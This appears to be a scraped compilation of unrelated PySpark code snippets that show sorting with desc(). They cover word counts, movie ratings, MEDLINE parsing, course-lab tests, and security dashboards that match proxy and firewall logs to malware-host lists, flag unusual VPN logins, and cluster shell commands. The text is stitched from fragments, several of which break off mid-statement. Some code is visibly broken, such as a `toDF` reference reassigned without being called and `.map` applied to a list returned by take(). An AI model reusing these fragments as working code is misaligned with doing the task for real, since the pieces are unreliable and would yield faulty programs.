def create_tag_frequencies(self, dataframe):
        """Produces a PySpark dataframe containing a column representing the total frequency of the tags by record.

        The frequency of tags is determined by their proportion of the total number of tags in the dataframe.

        :param dataframe: the PySpark dataframe
        :returns: the PySpark dataframe containing the tag frequency field and all fields in the supplied dataframe
        """
        df_tags = dataframe.selectExpr("tag1 AS tag").union(dataframe.selectExpr("tag2 AS tag")).union(dataframe.selectExpr("tag3 AS tag")) \
                           .union(dataframe.selectExpr("tag4 AS tag")).union(dataframe.selectExpr("tag5 AS tag"))
        df_tags = df_tags.na.drop(subset=["tag"])
        tags_total_count = df_tags.count()
        print("Total number of tags used, including duplicates:",tags_total_count)
        df_tag_freq = df_tags.groupBy("tag").count().orderBy(desc("count"))
        df_tag_freq = df_tag_freq.withColumn("frequency", col("count")/tags_total_count)
        df_tag_freq.orderBy(desc("frequency")).show(10)

        def one_hot_encode_top_n_tags(dataframe,n):
            """Produces a PySpark dataframe containing columns indicating whether each of the top n tags are present.

            :param dataframe: the PySpark dataframe 
            :param n: the number of the top ranked tags to return as tag fields
            :returns: the PySpark dataframe containing the top n tag fields and all fields in the supplied dataframe
            """
            top_n = [t.tag for t in df_tag_freq.orderBy(desc("frequency")).select("tag").limit(n).collect()]
            for tag in top_n:
                # replace tag name ".net" with "dotnet", for example, to avoid problems with periods in tag names
                tag_column_name = ("tag_"+tag).replace(".","dot")
                dataframe = dataframe.withColumn(tag_column_name, array_contains(dataframe.tags_split, tag).cast("int"))
            return dataframe

        dataframe = one_hot_encode_top_n_tags(dataframe,20)
        tag_columns = [col for col in dataframe.columns if col.startswith('tag')]

        print("Tag-related columns")
        dataframe.select(tag_columns).show(10,False)

        dataframe.createOrReplaceTempView('df')
        df_tag_freq.createOrReplaceTempView('df_tag_freq')

        for n in range(1,6):
            dataframe = self.sqlContext.sql("SELECT df.*, df_tag_freq.frequency AS frequency_tag{} FROM df LEFT JOIN df_tag_freq ON df.tag{} = df_tag_freq.tag".format(n,n))
            dataframe = dataframe.na.fill({"frequency_tag{}".format(n): 0})
            dataframe.createOrReplaceTempView('df')

        dataframe = dataframe.withColumn("frequency_sum", col("frequency_tag1")+col("frequency_tag2")+col("frequency_tag3")+col("frequency_tag4")+col("frequency_tag5"))

        # Remove temporary columns
        dataframe = dataframe.select([c for c in dataframe.columns if c not in {"tags_split","tag1","tag2","tag3","tag4","tag5","frequency_tag1","frequency_tag2", \
                                      "frequency_tag3","frequency_tag4","frequency_tag5"}])
        return(dataframe)
def process_file(date_update):
    """Process downloaded MEDLINE folder to parquet file"""
    print("Process MEDLINE file to parquet")
    # remove if folder still exist
    if glob(os.path.join(save_dir, 'medline_*.parquet')):
        subprocess.call(['rm', '-rf', 'medline_*.parquet'])

    date_update_str = date_update.strftime("%Y_%m_%d")
    path_rdd = sc.parallelize(glob(os.path.join(download_dir, 'medline*.xml.gz')), numSlices=1000)
    parse_results_rdd = path_rdd.\
        flatMap(lambda x: [Row(file_name=os.path.basename(x), **publication_dict)
                           for publication_dict in pp.parse_medline_xml(x)])
    medline_df = parse_results_rdd.toDF()
    medline_df.write.parquet(os.path.join(save_dir, 'medline_raw_%s.parquet' % date_update_str),
                             mode='overwrite')

    window = Window.partitionBy(['pmid']).orderBy(desc('file_name'))
    windowed_df = medline_df.select(
        max('delete').over(window).alias('is_deleted'),
        rank().over(window).alias('pos'),
        '*')
    windowed_df.\
        where('is_deleted = False and pos = 1').\
        write.parquet(os.path.join(save_dir, 'medline_lastview_%s.parquet' % date_update_str),
                      mode='overwrite')

    # parse grant database
    parse_grant_rdd = path_rdd.flatMap(lambda x: pp.parse_medline_grant_id(x))\
        .filter(lambda x: x is not None)\
        .map(lambda x: Row(**x))
    grant_df = parse_grant_rdd.toDF()
    grant_df.write.parquet(os.path.join(save_dir, 'medline_grant_%s.parquet' % date_update_str),
                           mode='overwrite')
Exemple #3
0
    def getProxyIntelHits(self, fromdate, todate):
        '''
        :return:
        '''
        self.proxyDF = self.buildParquetFileList('proxysg', fromdate, todate)
        self.sc.setLocalProperty("spark.scheduler.pool", "dashboard")
        self.proxyDF.createOrReplaceTempView('proxysg')
        self.session.read.parquet('/data/srm/dbs/dw_srm.db/otx').createOrReplaceTempView('otx')
        self.session.read.parquet('/data/srm/dbs/dw_srm.db/c2').createOrReplaceTempView('c2')

        #self.proxyDF.persist(StorageLevel.MEMORY_AND_DISK_SER)

        sgotx = self.session.sql('select proxysg.host from proxysg join otx on otx.ip=proxysg.host')
        sgc2 = self.session.sql('select proxysg.host from proxysg join c2 on c2.host=proxysg.host')
        sgall = sgotx.unionAll(sgc2)

        # This breaks the Kryo serializer - unknown class
        entries = sgall.groupBy(sgall.host).count().orderBy(desc('count')).limit(20).collect()

        # Build json object for the table
        data = []
        descriptionTable = {
            "host": ("string", "Malware host"),
            "count": ("number", "Hits")
        }

        for entry in entries:
            data.append({"host": entry.host, "count": int(entry[1])})

        data_table = gviz_api.DataTable(descriptionTable)
        data_table.LoadData(data)
        # Creating a JSon string
        jsonTable = data_table.ToJSon(columns_order=("host", "count"), order_by="count")

        return jsonTable
 def makeWordCloud(row, df):
     rows = df.filter(df['subreddit'] == row['subreddit']).orderBy(desc('score'))
     count = rows.count()
     if count > 50:
         # map to term frequency tuples
         frequencies = rows.select(['term', 'score']).take(max(count, 500)).map(lambda x: (x['term'], x['score'])).collect()
         save_word_cloud(row['subreddit'], frequencies)
def pagerank_topk(ranks_in, k=10):
    '''retrieve the top 'k' pagerank vertices and associated with metadata'''
    df_rank_slice = ranks_in.vertices.select('id', 'department', 'type', 'pagerank')\
                            .orderBy(desc("pagerank"))\
                            .limit(k)
    df_ranks = df_rank_slice.toPandas().sort_values(by='pagerank', ascending=False)
    df_ranks.id = df_ranks.id.astype(long)
    return df_ranks
Exemple #6
0
def compute(day):
    # On veut les jours day-30 à day-1
    sums = wikipediadata.where(
            (wikipediadata.day >= day-30) & (wikipediadata.day <= day-1))

    # Sous-ensemble de test
    #sums = sums.where((sums.page == 'Cadillac_Brougham') | ((sums.page == 'Roald_Dahl') & (sums.projectcode == 'fr')))

    # On somme les heures de la journées
    sums = sums.groupby('projectcode', 'page', 'day').sum('views')
    # On cache pour plus tard
    sums.cache()

    # on définit une windows := jour precedent
    window_spec =  Window.partitionBy(sums.projectcode, sums.page) \
            .orderBy(sums.day.asc()).rowsBetween(-1, -1)

    # on calcule la différence entre views(d) - views(d-1)
    diffs = sums.withColumn('diff', sums.views - F.sum(sums.views) \
            .over(window_spec))

    # on calcule les coefs à appliquer à chaque jour
    coefs = pd.DataFrame({'day': range(day-30, day)})
    coefs['coef'] = 1. / (day - coefs.day)

    coefs = hc.createDataFrame(coefs)
    diffs = diffs.join(coefs, 'day')

    # on calcul le score de chaque jour
    diffs = diffs.withColumn('sub_score', diffs.diff * diffs.coef)

    totals = diffs.groupby('projectcode', 'page').sum('views', 'sub_score')
    # on normalise par la racine de la somme des views 
    totals = totals.withColumn('score',
            totals['SUM(sub_score)'] / F.sqrt(totals['SUM(views)'])) \
            .orderBy(F.desc('score')) \
            .withColumnRenamed('SUM(views)', 'total_views') \
            .limit(10)

    views = sums.select('projectcode', 'page', 'day', 'views') \
           .join(totals.select('projectcode', 'page', 'total_views', 'score'), 
                  (totals.projectcode == sums.projectcode) & (totals.page == sums.page), 'right_outer')

    df = totals.select('projectcode', 'page', 'total_views', 'score').toPandas()
    df2 = views.toPandas()
    df2 = df2.iloc[:, 2:]
    df2 = df2.pivot_table(values='views', columns=['day'], index=['projectcode', 'page'], fill_value=0)
    df = df.merge(df2, left_on=['projectcode', 'page'], right_index=True)
    df.to_csv(filename(day), index=False)
    
    # on vide le cache
    hc.clearCache()
        def one_hot_encode_top_n_tags(dataframe,n):
            """Produces a PySpark dataframe containing columns indicating whether each of the top n tags are present.

            :param dataframe: the PySpark dataframe 
            :param n: the number of the top ranked tags to return as tag fields
            :returns: the PySpark dataframe containing the top n tag fields and all fields in the supplied dataframe
            """
            top_n = [t.tag for t in df_tag_freq.orderBy(desc("frequency")).select("tag").limit(n).collect()]
            for tag in top_n:
                # replace tag name ".net" with "dotnet", for example, to avoid problems with periods in tag names
                tag_column_name = ("tag_"+tag).replace(".","dot")
                dataframe = dataframe.withColumn(tag_column_name, array_contains(dataframe.tags_split, tag).cast("int"))
            return dataframe
Exemple #8
0
    def getVPNUnusualActivity(self):
        self.sc.setLocalProperty("spark.scheduler.pool", "dashboard")

        adlocation = self.session.read.csv(header='true', inferSchema='true', path='/user/jleaniz/ad.csv')
        adlocation.cache()

        vpn = self.session.read.parquet('/data/srm/dbs/dw_srm.db/ciscovpn').rdd
        vpn.cache()

        def func(x):
            gi = GeoIP.open("GeoIP.dat",GeoIP.GEOIP_MEMORY_CACHE)
            cc = gi.country_code_by_addr(x.remoteip)
            return Row(bytesrcv=x.bytesrcv, bytesxmt=x.bytesxmt, duration=x.duration, localip=x.localip, reason=x.reason,
                       remoteip=x.remoteip, source=x.source, time=x.time, user=x.user, date=x.date, remoteipcc=cc)

        vpnDF = vpn.map(func).toDF()
        joinDF = vpnDF.join(adlocation, vpnDF.user == adlocation.EmailAddress)
        joinDF.cache()

        fromOtherLocations = joinDF.filter("remoteipcc <> c")
        groupDF = fromOtherLocations.groupBy(fromOtherLocations.user, fromOtherLocations.remoteip, fromOtherLocations.remoteipcc, fromOtherLocations.c)\
            .count()\
            .orderBy(desc('count'))
        entries = groupDF.collect()

        # Build json object for the table
        dataChart = []
        descriptionChart = {
            "user": ("string", "User"),
            "c": ("string", "Office"),
            "remoteip": ("string", "Remote IP"),
            "remoteipcc": ("string", "Remote IP CC"),
            "count": ("number", "Count")
        }

        for entry in entries:
            dataChart.append({
                "user": entry.user,
                "c": entry.c,
                "remoteip": entry.remoteip,
                "remoteipcc": entry.remoteipcc,
                "count": int(entry[4])})

        data_tableChart = gviz_api.DataTable(descriptionChart)
        data_tableChart.LoadData(dataChart)
        # Creating a JSon string
        vpn_logins = data_tableChart.ToJSon(
            columns_order=("user", "c", "remoteip","remoteipcc","count"),
            order_by="count"
        )
        return vpn_logins
Exemple #9
0
def runOtherFunctions(spark, personDf):
    df = spark.createDataFrame([("v1", "v2", "v3")], ["c1", "c2", "c3"]);

    # array
    df.select(df.c1, df.c2, df.c3, array("c1", "c2", "c3").alias("newCol")).show(truncate=False)

    # desc, asc
    personDf.show()
    personDf.sort(functions.desc("age"), functions.asc("name")).show()

    # pyspark 2.1.0 버전은 desc_nulls_first, desc_nulls_last, asc_nulls_first, asc_nulls_last 지원하지 않음

    # split, length (pyspark에서 컬럼은 df["col"] 또는 df.col 형태로 사용 가능)
    df2 = spark.createDataFrame([("Splits str around pattern",)], ['value'])
    df2.select(df2.value, split(df2.value, " "), length(df2.value)).show(truncate=False)

    # rownum, rank
    f1 = StructField("date", StringType(), True)
    f2 = StructField("product", StringType(), True)
    f3 = StructField("amount", IntegerType(), True)
    schema = StructType([f1, f2, f3])

    p1 = ("2017-12-25 12:01:00", "note", 1000)
    p2 = ("2017-12-25 12:01:10", "pencil", 3500)
    p3 = ("2017-12-25 12:03:20", "pencil", 23000)
    p4 = ("2017-12-25 12:05:00", "note", 1500)
    p5 = ("2017-12-25 12:05:07", "note", 2000)
    p6 = ("2017-12-25 12:06:25", "note", 1000)
    p7 = ("2017-12-25 12:08:00", "pencil", 500)
    p8 = ("2017-12-25 12:09:45", "note", 30000)

    dd = spark.createDataFrame([p1, p2, p3, p4, p5, p6, p7, p8], schema)
    w1 = Window.partitionBy("product").orderBy("amount")
    w2 = Window.orderBy("amount")
    dd.select(dd.product, dd.amount, functions.row_number().over(w1).alias("rownum"),
              functions.rank().over(w2).alias("rank")).show()
Exemple #10
0
    def getfwMalwareConns(self, fromdate, todate):

        self.fwDF = self.buildParquetFileList('fw', fromdate, todate)
        self.fwDF.createOrReplaceTempView('fw')
        #self.fwDF.persist(StorageLevel.MEMORY_AND_DISK_SER)
        self.session.read.parquet('/data/srm/dbs/dw_srm.db/otx').createOrReplaceTempView('otx')
        self.session.read.parquet('/data/srm/dbs/dw_srm.db/c2').createOrReplaceTempView('c2')

        self.sc.setLocalProperty("spark.scheduler.pool", "dashboard")
        fwotx = self.session.sql('select fw.dstip from fw join otx on otx.ip=fw.dstip')
        fwc2 = self.session.sql('select fw.dstip from fw join c2 on c2.host=fw.dstip')
        fwall = fwotx.unionAll(fwc2)

        groupcnt = fwall.groupBy(fwall.dstip).count().orderBy(desc('count'))

        entries = groupcnt.collect()

        # Build json object for the table
        dataChart = []
        descriptionChart = {
            "dstip": ("string", "Malicious host"),
            "count": ("number", "Hits")
        }

        for entry in entries:
            dataChart.append({"dstip": entry.dstip, "count": entry[1]})

        data_tableChart = gviz_api.DataTable(descriptionChart)
        data_tableChart.LoadData(dataChart)
        # Creating a JSon string
        fw_mal_conns = data_tableChart.ToJSon(
            columns_order=("dstip", "count"),
            order_by="count"
        )

        return fw_mal_conns
Exemple #11
0
    .master("local") \
    .appName("cassandra Word Count") \
    .getOrCreate()

spark.sparkContext._conf.setAll([('spark.executor.memory', '4g'), \
                                 ('spark.executor.cores', '4'), \
                                 ('spark.cores.max', '4'), \
                                 ('spark.driver.memory','4g')])

# print(spark.sparkContext._conf.getAll())

spRDD = spark.createDataFrame(pdDF).cache()
# spRDD.printSchema()

# Counts people by age
countsByhashtags = spRDD.groupBy("hashtags").count().sort(desc("count"))
countsByhashtags.show(10)

onlyText = spRDD.select("tweet_text")
onlyText.show(5)

sparkRDD = onlyText.rdd

splitted = sparkRDD.flatMap(lambda line: str(line).split(' '))
# .reduce(lambda word : (word , 1))

reduced = splitted.map(lambda word : (str(word), 1)) \
    .reduceByKey(lambda a, b: a + b) \
        .sortBy(lambda a: -a[1])

topWords = reduced.collect()[:20]
csvDF = spark \
    .readStream \
    .option("sep", ";") \
    .schema(userSchema) \
    .csv("hdfs://localhost:9000/stream/")
'''words=csvDF.select(explode(split(csvDF.Hashtags,",")).alias("hashtag"))
	
wordcounts=words.groupBy("hashtag").count().select("hashtag","count")
wc=wordcounts.orderBy(desc("count")).select("hashtag")
#ws=wordcounts..show(10)
'''
ratio = csvDF.select("name",
                     (col("Followers") / col("Friends")).alias("FRRatio"))
ratio = ratio.groupBy("name", "FRRatio").count()
r = ratio.orderBy(desc("FRRatio")).select(col("name"), col("FRRatio")).limit(1)
#ratio = csvDF.select("ratio")
#print("sorted bruh")
query=r \
 .writeStream \
 .outputMode ("append") \
 .format("console") \
 .start()
query.awaitTermination(60)
query.stop()
'''
	
s=csvDF.groupBy("Hashtags").count() \
  .writeStream \
  .outputMode("complete") \
  .format("console") \
Exemple #13
0
print("生成数据list")
rows =[Row(name="Jack", age="37", group="qe"),
    Row(name="John", age="25", group="qe"),
    Row(name="Tom", age="34", group="qa"),
    Row(name="Phoenix", age="29", group="qe"),
    Row(name="Rose", age="23", group="qa")]
sc = SparkContext()
sqlContext = SQLContext(sc)

print("####生成DataFrame####")
data = sqlContext.createDataFrame(rows)

print("####展示数据####")
data.show()

print("####打印schema模式名称####")
data.printSchema()

print("####选择某一列查看####")
data.select("name").show()
data.select("name","age",col("group").alias("Group")).show()

print("####根据条件筛选显示####")
data.filter(col("age") >= 32).orderBy("name").show()
data.select("name","age").where(col("age") >= 32).orderBy("name").show()
data.select("name","age").where(col("age") >= 32).orderBy(desc("name"),"age").show()

print("####对DataFrame进行分组和函数计算####")
data.groupBy("group").count().show()
data.groupBy("group").agg(avg("age")).show()
yelp_df.filter(yelp_df.useful >= 1).count()
yelp_df.filter('useful >= 1').count()

# select - subset of data createDataFrame
yelp_df.select("useful")
yelp_df.select("useful").agg({"useful" : "max"}).collect()

# scale
yelp_df.select("id", yelp_df.useful/28*100).show(5)
yelp_df.select("id", (yelp_df.useful/28*100).cast('int')).show(5)

# rename
yelp_df.select("id", (yelp_df.useful/28*100).cast('int').alias('useful_pct')).show(5)

# order
useful_perc_data = yelp_df.select(yelp_df["id"].alias('uid'), (yelp_df.useful/28*100).cast('int').alias('useful_pct')).orderBy(desc('useful_pct'))

# join + select
useful_perc_data.join(
	yelp_df,
	yelp_df.id == useful_perc_data.uid,
	"inner").select(useful_perc_data.uid, "useful_pct", "review_count").show(5)

# cache - after caching, second run became much faster
useful_perc_data.join(
	yelp_df,
	yelp_df.id == useful_perc_data.uid,
	"inner").cache().select(useful_perc_data.uid, "useful_pct", "review_count").show(5)

# logs
# set delimiter to windows line end
from pyspark.sql import SparkSession
from pyspark.sql import functions as func
from pyspark.sql.types import StructType, StructField, StringType, IntegerType, FloatType, LongType
from pyspark.sql.functions import count

import os
spark = SparkSession.builder.appName("MinTemperatures").getOrCreate()
schema = StructType([
    StructField("userID", IntegerType(), True),
    StructField("movieID", IntegerType(), True),
    StructField("rating", IntegerType(), True),
    StructField("timestamp", LongType(), True)
])
# Read file as dataframe
curwd = os.getcwd()
df = spark.read.option(
    "sep", "\t").schema(schema).csv(f"file:///{curwd}/datasets/ml-100k/u.data")
print("printing schema: ")
df.printSchema()
# topMoviesIDs = df.groupBy("movieID").count().orderBy(func.desc("count"))
topMoviesIDs = df.groupBy("movieID").agg(
    count("timestamp").alias("countzer")).orderBy(func.desc("countzer"))
topMoviesIDs.show(10)
# kill session
spark.stop()
    def getPieColInfo(self, numerical):
        # If user selects a column in dialog box, give it to them
        keyFields = self.options.get("keyFields")
        if keyFields is not None:
            return keyFields

        schema = self.entity.schema
        default=None
        for field in schema.fields:
            # Ignore unique ids
            if field.name.lower() != 'id' and ( not numerical or isNum(field.dataType.__class__.__name__) ):
            # Find a good column to display in pie ChartDisplay
                default = default or field.name
                count = self.entity.count()
                sample = self.entity.sample(False, (float(200) / count)) if count > 200 else self.entity
                orderedSample = sample.groupBy(field.name).agg(F.count(field.name).alias("agg")).orderBy(F.desc("agg")).select("agg")
                if orderedSample.take(1)[0]["agg"] > 10:
                    return field.name
        # Otherwise, return first non-id column
        return default
# TEST Remove empty elements (4d)
Test.assertEquals(shakeWordsDF.count(), 882996, 'incorrect value for shakeWordCount')
Test.assertEquals(shakeWordsDF.columns, ['word'], "shakeWordsDF should only contain the Column 'word'")

# COMMAND ----------

# MAGIC %md
# MAGIC ** (4e) Count the words **
# MAGIC
# MAGIC We now have a DataFrame that is only words.  Next, let's apply the `wordCount()` function to produce a list of word counts. We can view the first 20 words by using the `show()` action; however, we'd like to see the words in descending order of count, so we'll need to apply the [`orderBy` DataFrame method](http://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.DataFrame.orderBy) to first sort the DataFrame that is returned from `wordCount()`.
# MAGIC
# MAGIC You'll notice that many of the words are common English words. These are called stopwords. In a later lab, we will see how to eliminate them from the results.

# COMMAND ----------

# TODO: Replace <FILL IN> with appropriate code

from pyspark.sql.functions import desc
topWordsAndCountsDF = wordCount(shakeWordsDF).orderBy(desc('count'))
topWordsAndCountsDF.show()

# COMMAND ----------

# TEST Count the words (4e)
Test.assertEquals(topWordsAndCountsDF.take(15),
                  [(u'the', 27361), (u'and', 26028), (u'i', 20681), (u'to', 19150), (u'of', 17463),
                   (u'a', 14593), (u'you', 13615), (u'my', 12481), (u'in', 10956), (u'that', 10890),
                   (u'is', 9134), (u'not', 8497), (u'with', 7771), (u'me', 7769), (u'it', 7678)],
                  'incorrect value for top15WordsAndCountsDF')
    print('Number of Method=\'Discover\': ', df.filter(df.Method == 'Discover').count())

    '''
    Can be written like this as well,

    >>> from pyspark.sql.functions import sum
    >>> for row in df.groupBy(df.Method).agg(sum(df.Amount))\
            .withColumnRenamed('sum(Amount)', 'Total')\
            .orderBy('Total', ascending=False)\
            .take(3):
            print(row)
    '''
    print('>>> Top 3 Methods using Dataframe API >>>')
    for row in df.groupBy(df.Method).sum()\
        .withColumnRenamed('sum(Amount)', 'Total')\
        .orderBy(desc('Total'))\
        .take(3):
        print(row)

    print('>>> Top 3 Methods using SQL >>>')
    df.createOrReplaceTempView('temp')
    sql_str = 'select Method, sum(Amount) as Total from temp group by Method order by Total desc'
    for row in spark.sql(sql_str).take(3):
        print(row)

    # code for cleaning up memory...
    spark.catalog.dropTempView("temp")
    df.unpersist()
        
Exemple #19
0
# COMMAND ----------

# TODO

FILL_IN

# COMMAND ----------

# TEST - Run this cell to test your solution
from pyspark.sql.functions import desc

ipCountDF2 = (spark
  .read
  .parquet("/tmp/ipCount.parquet")
  .orderBy(desc("count"))
)
ip1, count1 = ipCountDF2.first()
cols = set(ipCountDF2.columns)

dbTest("ET1-P-02-02-01", "213.152.28.bhe", ip1)
dbTest("ET1-P-02-02-02", True, count1 > 500000 and count1 < 550000)
dbTest("ET1-P-02-02-03", {'count', 'ip'}, cols)

print("Tests passed!")

# COMMAND ----------

# MAGIC %md
# MAGIC Check the load worked by using `%fs ls <path>`.  Parquet divides your data into a number of files.  If successful, you see a `_SUCCESS` file as well as the data split across a number of parts.
# MAGIC %md
# MAGIC ### (5c) Exercise: Listing the Top Twenty 404 Response Code paths
# MAGIC
# MAGIC Using the DataFrame containing only log records with a 404 response code that you cached in part (5a), print out a list of the top twenty paths that generate the most 404 errors.
# MAGIC
# MAGIC *Remember, top paths should be in sorted order*

# COMMAND ----------

# TODO: Replace <FILL IN> with appropriate code

top_20_not_found_df = (not_found_paths_df
                       .groupBy('path')
                       .count()
                       .sort(desc('count')))

print 'Top Twenty 404 URLs:\n'
top_20_not_found_df.show(n=20, truncate=False)

# COMMAND ----------

# TEST Top twenty 404 URLs (5c)

top_20_not_found = [(row[0], row[1]) for row in top_20_not_found_df.take(20)]
top_20_expected = [
 (u'/pub/winvn/readme.txt', 633),
 (u'/pub/winvn/release.txt', 494),
 (u'/shuttle/missions/STS-69/mission-STS-69.html', 430),
 (u'/images/nasa-logo.gif', 319),
 (u'/elv/DELTA/uncons.htm', 178),
ratings_df = ratings_df.withColumn(
    'Timestamp',
    F.col('SplitValues').getItem(3).cast(IntegerType()))
ratings_df = ratings_df.drop(F.col('SplitValues'))
'''
# Import users.dat
users_df = spark.read.format("csv").load("data/users.dat")
users_df = users_df.select(F.split(users_df.columns[0], "::").alias('SplitValues'))
users_df = users_df.withColumn('UserID', F.col('SplitValues').getItem(0).cast(IntegerType()))
users_df = users_df.withColumn('Gender', F.col('SplitValues').getItem(1))
users_df = users_df.withColumn('Age', F.col('SplitValues').getItem(2).cast(ByteType()))
users_df = users_df.withColumn('Occupation', F.col('SplitValues').getItem(3).cast(ByteType()))
users_df = users_df.withColumn('Zip-code', F.col('SplitValues').getItem(4).cast(IntegerType()))
users_df = users_df.drop(F.col('SplitValues'))
'''

# Calculate average rating
avgratings_df = ratings_df.select(F.col('MovieID'), F.col('Rating'))
avgratings_df = avgratings_df.groupBy(F.col('MovieID')).agg(
    F.mean(F.col('Rating')).alias('Average Rating'))
avgratings_df = avgratings_df.join(movies_df,
                                   avgratings_df.MovieID == movies_df.MovieID)

# Write the output to output/exercise1.csv
output_df = avgratings_df.select('Title', 'Average Rating').sort(
    F.desc("Average Rating"))
output_df.write.mode("overwrite").csv('output/exercise1/avgrating')
os.system(f'rm output/exercise1/avgrating.csv')
os.system(
    f'cat output/exercise1/avgrating/p* > output/exercise1/avgrating.csv')

# COMMAND ----------

from pyspark.sql.functions import col, to_date
dfWithDate = df.withColumn("date", to_date(col("InvoiceDate"), "MM/d/yyyy H:mm"))
dfWithDate.createOrReplaceTempView("dfWithDate")


# COMMAND ----------

from pyspark.sql.window import Window
from pyspark.sql.functions import desc
windowSpec = Window\
  .partitionBy("CustomerId", "date")\
  .orderBy(desc("Quantity"))\
  .rowsBetween(Window.unboundedPreceding, Window.currentRow)


# COMMAND ----------

from pyspark.sql.functions import max
maxPurchaseQuantity = max(col("Quantity")).over(windowSpec)


# COMMAND ----------

from pyspark.sql.functions import dense_rank, rank
purchaseDenseRank = dense_rank().over(windowSpec)
purchaseRank = rank().over(windowSpec)
# MAGIC Add a single DataFrame transformation (in place of `<FILL_IN>`, below) to limit the results to movies with ratings from at least 500 people.

# COMMAND ----------

# TODO: Replace <FILL IN> with appropriate code
movies_with_500_ratings_or_more = movie_names_with_avg_ratings_df.filter(movie_names_with_avg_ratings_df['count'] >= 500)
print 'Movies with highest ratings:'
movies_with_500_ratings_or_more.show(20, truncate=False)

# COMMAND ----------

# TEST Movies with Highest Average Ratings and at least 500 Reviews (1b)

Test.assertEquals(movies_with_500_ratings_or_more.count(), 4489,
                  'incorrect movies_with_500_ratings_or_more.count(). Expected 4489.')
top_20_results = [(r['average'], r['title'], r['count']) for r in movies_with_500_ratings_or_more.orderBy(F.desc('average')).take(20)]

Test.assertEquals(top_20_results,
                  [(4.446990499637029, u'Shawshank Redemption, The (1994)', 63366),
                   (4.364732196832306, u'Godfather, The (1972)', 41355),
                   (4.334372207803259, u'Usual Suspects, The (1995)', 47006),
                   (4.310175010988133, u"Schindler's List (1993)", 50054),
                   (4.275640557704942, u'Godfather: Part II, The (1974)', 27398),
                   (4.2741796572216, u'Seven Samurai (Shichinin no samurai) (1954)', 11611),
                   (4.271333600779414, u'Rear Window (1954)', 17449),
                   (4.263182346109176, u'Band of Brothers (2001)', 4305),
                   (4.258326830670664, u'Casablanca (1942)', 24349),
                   (4.256934865900383, u'Sunset Blvd. (a.k.a. Sunset Boulevard) (1950)', 6525),
                   (4.24807897901911, u"One Flew Over the Cuckoo's Nest (1975)", 29932),
                   (4.247286821705426, u'Dr. Strangelove or: How I Learned to Stop Worrying and Love the Bomb (1964)', 23220),
                   (4.246001523229246, u'Third Man, The (1949)', 6565),
display(g.outDegrees)

# COMMAND ----------

display(g.degrees)

# COMMAND ----------

display(g.edges.filter("dst = '4' and HelpfulnessDenominator > 60"))

# COMMAND ----------

result = g.stronglyConnectedComponents(maxIter = 10)
display(result.select("id", "Component"))

# COMMAND ----------

ranks = g.pageRank(resetProbability= 0.15, maxIter = 5)
display(ranks.vertices.orderBy(ranks.vertices.pagerank.desc()).limit(100))
# display(ranks.vertices.orderBy(desc("pagerank")))

# COMMAND ----------

from pyspark.sql.functions import desc
display(g.edges.filter("Score = '4'").groupBy("src", "dst").avg("HelpfulnessDenominator").sort(desc("avg(HelpfulnessDenominator)")).limit(100))

# COMMAND ----------


Exemple #25
0
                     StructField("movieID", IntegerType(), True), \
                     StructField("rating", IntegerType(), True), \
                     StructField("timestamp", LongType(), True)])

# Load up movie data as dataframe
moviesDF = spark.read.option("sep", "\t").schema(schema).csv(
    "file:///opt/bitnami/spark/datasets/ml-100k/u.data")

movieCounts = moviesDF.groupBy("movieID").count()


# Create a user-defined function to look up movie names from our broadcasted dictionary
def lookupName(movieID):
    return nameDict.value[movieID]


lookupNameUDF = func.udf(lookupName)

# Add a movieTitle column using our new udf
moviesWithNames = movieCounts.withColumn("movieTitle",
                                         lookupNameUDF(func.col("movieID")))

# Sort the results
sortedMoviesWithNames = moviesWithNames.orderBy(func.desc("count"))

# Grab the top 10
sortedMoviesWithNames.show(10, False)

# Stop the session
spark.stop()
Exemple #26
0
from pyspark.sql import SparkSession
from pyspark.sql import functions as F
import pandas as pd
from pyspark.sql.functions import desc


spark = SparkSession \
    .builder \
    .appName("Python NBA Salaries") \
    .getOrCreate()

df = spark.read.csv("NBACleanData/StatsClean.csv", header=True)
df.createOrReplaceTempView("stats")

df2 = spark.sql("SELECT Pos, SUM(PTS) AS total_points FROM stats GROUP BY Pos")

df2 = df2.sort(desc("total_points"))
df2.show()

pandasDF = df2.toPandas()
pandasDF.rename(columns={'total_points': 'Points'},inplace=True)


pandasDF.to_csv('NBACleanData/AlltimeScoringPos.csv', index=False)

Exemple #27
0
def get_recommendations_by_cluster_app(cluster, purchased_quantities):                                                        
    
    # Existing customer products
    
    customer_products = []
    

    
    
    
    for i in range(0, len(product_cols)):
        
        if purchased_quantities[i] > 0:
            
            customer_products.append((product_cols[i], purchased_quantities[i]))
        
            
    df_customer_products = sc.parallelize(customer_products).toDF(["PRODUCT","COUNT"])
    
    # Get popular products in the cluster
    
    cluster_products = get_popular_products_in_cluster(cluster)
    
    df_cluster_products = sc.parallelize(cluster_products).toDF(["PRODUCT","COUNT"])
    
    df_cluster_products = sc.parallelize(cluster_products).toDF
    
    
    # Filter out products the user has already purchased
    
    
    df_recommended_products = df_cluster_products.alias('cl').join(df_customer_products.alias('cu'), df_cluster_products['PRODUCT'] == df_customer_products['PRODUCT'], 'leftouter')
    

    df_recommended_products = df_recommended_products.filter('cu.PRODUCT IS NULL').select('cl.PRODUCT','cl.COUNT').sort(desc('cl.COUNT'))
    
    return df_recommended_products     
 def question_two(self, spark):
     rawDF = self.question_one(spark, data_only=True)
     rawDF.groupBy("company")\
          .agg(round(sum("purchase_cost"), 2).alias("revenue"))\
          .orderBy(desc("revenue"))\
          .show(10)
Exemple #29
0
# Create KM model and fit using up to date data
kmeans = KMeans(k=650, seed=42, featuresCol="features", predictionCol="prediction", maxIter=10, initSteps=3)
kmodel = kmeans.fit(df)

#test = kmodel.transform(featuresOut)

'''
########## DEMO #########
'''
df.groupBy(df.prediction).count().orderBy(asc('count')).show(50)
groups = df.groupBy(df.prediction.alias("prediction2")).count().orderBy(asc('count')).filter('count < 40')
df.join(groups, groups.prediction2==df.prediction).select('command','prediction').distinct().show()
df.join(groups, groups.prediction2==df.prediction).select('command').distinct().show(500,truncate=False)

groups = df.groupBy(df.prediction.alias("prediction2")).count().orderBy(desc('count')).filter('count > 100000')
df.join(groups, groups.prediction2==df.prediction).select('command').distinct().show(500,truncate=False)


groups = sc.parallelize(df.groupBy(df.prediction.alias("prediction2")).count().orderBy(desc('count')).head(10)).toDF()
df.join(groups, groups.prediction2==df.prediction).select('command').distinct().show(50,truncate=False)

# Create a new DF with some weird commands
test1 = ctx.createDataFrame([
], ["command"])

test2 = ctx.createDataFrame([
